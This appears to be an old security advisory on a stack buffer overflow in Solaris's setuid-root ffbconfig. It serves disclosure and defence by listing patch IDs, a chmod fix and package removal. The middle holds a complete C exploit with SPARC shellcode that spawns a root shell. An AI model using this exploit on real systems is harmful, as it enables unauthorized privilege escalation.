COMMAND
/usr/sbin/ffbconfig
SYSTEMS AFFECTED
Solaris 2.4 with the Fast Buffer Graphics Accelerator card
installed.
PROBLEM
(FFB) Graphics Accelerator, and is part of the FFB Configuration
Software package, SUNWffbcf. This software is only of use if the
FFB Graphics accelerator card is installed. If the device
/dev/fbs/ffb0 exists, it may indicate that the card is installed.
Due to insufficient bounds checking on arguments which are
supplied by users, it is possible to overwrite the internal stack
space of the ffbconfig program while it is executing. By
supplying a carefully designed argument to the ffbconfig program,
intruders may be able to force ffbconfig to execute arbitrary
commands. As ffbconfig is setuid root, this may allow intruders
to run arbitrary commands with root privileges.
Cristian SCHIPOR <skipo@SUNDY.CS.PUB.RO> have found a buffer
overflow hole in ffbconfig (Solaris2.X). That allow you to gain
root access on your machine. He used an exploit written by Jeremy
Elson for gethostbyname() buffer overflow hole (he modified some
values to make this work). Here comes Cristian's exploit:
/*
This works on Solaris 2.4 wiz /usr/sbin/ffbconfig from a Solaris 2.5
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 128
#define EXTRA 256
#define STACK_OFFSET 128
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),so;
long_p = (u_long *) buf;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl("/usr/sbin/ffbconfig", "ffbconfig", "-dev", buf,(char *) 0);
perror("execl failed");
}
SOLUTION
The vulnerability relating to ffbconfig is fixed by the following
patches:
OS version Patch ID
---------- --------
SunOS 5.5.1 103796-09
SunOS 5.5 103076-09
The above-mentioned patches are listed in the Graphics section
under Unbundled Products at:
ftp://sunsolve1.sun.com/pub/patches/patches.html.
You can also as alternative remove setuid and non-root execute
permissions:
# chmod 500 /usr/sbin/ffbconfig
# ls -l /usr/sbin/ffbconfig
-r-x------ 1 root bin 31436 Oct 14 1995 /usr/sbin/ffbconfig
or remove the SUNWffbcf package:
# /usr/sbin/pkgrm SUNWffbcf
There are also a number of other packages which are also
associated with the FFB Graphics Accelerator:
SUNWffb FFB System Software (Device Driver)
SUNWffbmn On-Line FFB Manual Pages
SUNWffbw FFB Window System Support
SUNWffbxg FFB XGL support
Although there is nothing to suggest that these packages contain
vulnerabilities, if you do not require their functionality, you
may also wish to remove them with the /usr/sbin/pkgrm command.
Also, there is report that you can gain root priviledge by this
exploit under AFS UNIX system, but even you have UID=0 it means
nothing to you because cause you don't have root priviledges and
this is because 'fs' takes over 'chmod'.